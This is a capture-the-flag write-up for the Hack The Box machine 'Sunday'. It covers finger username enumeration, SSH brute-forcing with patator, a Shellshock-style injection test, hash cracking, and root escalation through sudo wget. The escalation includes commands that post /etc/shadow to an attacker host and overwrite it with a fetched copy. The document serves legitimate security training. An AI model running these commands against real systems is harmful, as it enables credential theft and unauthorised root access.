HTB Write-up Sunday Port 79 (finger) Enum, SSH pass cracking with panator
What I learned today:
- Nmap: -p- — max-retries 1 (or 0) — this speeds up the all port scan a bit.
- Port 79 fingerprint service , https://en.wikipedia.org/wiki/Finger_%28protocol%29
it revealed some usernames on the service with the finger-user-enum tool.
- ssh: add keyalgorithm with -okexAlgorithms=+ALGORITHM_ NAME
- By using |less -s kills off line wrapping (otherwise, the output is too messy)
- For ssh password cracking, use patator
syntax: patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/ persistent=0 -x ignore:mesg=’Authentication failed.’
Wget
- wget -i to read files
- wget — post-file=FILE_PATH IP to upload a file to kali (nc open on 80)
openssl passwd -5 -salt thesalt pass123
Regular enumuration won’t show the extra ports that are open which includes SSH port.
do -p- scan even though it takes forever (speed it up by doing -p- — max-retries 1 (or 0) — > once we find weird ports, do port-specific scan like
nmap -sC -sV -p 79,111,22022,35342,56252 -oA targeted_scan IP_address
Port 79 fingerprint service , https://en.wikipedia.org/wiki/Finger_%28protocol%29
Enumeration-
For finger enum, I used
finger-user-enum
finger-user-enum | pentestmonkey
For usernames, used /usr/share/seclists/Usernames/Names/names.txt
Syntax:
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.159.222 |less -S
By using |less -s kills off line wrapping (otherwise, the output is too messy)
We got sammy and sunny
We can try to ssh into it. The password for sammy account was sunny.
When you try to login, it might give this error;
“No matching key exchange method found. Their offer : ~”
Try to add the key algorithm with “-okexAlgorithms=+ALGORITHM_ NAME”
Now we are in.
SSH Password Cracking
For ssh password cracking, use patator
syntax:
patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/ persistent=0 -x ignore:mesg=’Authentication failed.’
use a password list that’s not too big or create your own password list.
515 printer
Found info about LPD here and tried it but didn’t get the result — negative acknowledgement. \
oh wait…
python lpdtest.py 10.129.159.222 in ‘() {:;}; ping -c1 10.10.14.125’
I used the above command and it executed it…
Does that mean we can get the shell back?
— — didn’t work.
Priv Esc
When looking into the files, we found a backup file.
found a shadow file.
Crack the hash with hashcat: hashcat -m 7400 hash.txt rockyou.txt
Cracked the password for summy.
Switched user to sammy with the password.
Now it’s showing that the system name — SunOS 5.11 -maybe vulnerable to shellshock?
Random=’() { :;}; echo nyannyannyan’ bash -c:
If this worked it’s possible that the system is vulnerable to shellshock
sudo -l to check if any environmental valuables are kept.
no env valuables.
do env and just pick one to use.
Looks like it’s not vulnerable this time.
When checking sammy’s sudo -l, wget is available.
wget -h to see all the options we could use:
wget -i enabled us to see root files.
Create a file called “troll” with content like below.
#!/usr/bin/bash
bash
Upload it with the sammy account:
sudo wget http://10.10.14.131/troll -O /root/troll
and switch back to sunny to execute it(who has sudo access)
In this particular box, there’s a task that’s overwriting the file.
to prevent this, let’s have two ssh sessions open: one from the sammy (Wget to upload the file) and one from Sunny(to execute the file)
and on sammy, use
sleep5; sudo wget 10.10.14.131/troll -O /root/troll
to make the system sleep for 5 seconds, and then quickly run the file on the sammy
for some reason, I couldn’t execute the /root/troll, I’m going to try another method.
Used sudo wget — post-file=/etc/shadow 10.10.14.131 to upload the shadow file to kali (nc open on 80)
Created a new file called shadow:
Create a new hash
openssl passwd -5 -salt thesalt pass123
Copied!
Paste the hash to the top
Upload the shadow file to sammy account
sudo wget 10.10.14.131/shadow /etc/shadow
We can confirm that the shadow file got updated here.
With the new pass, I got in!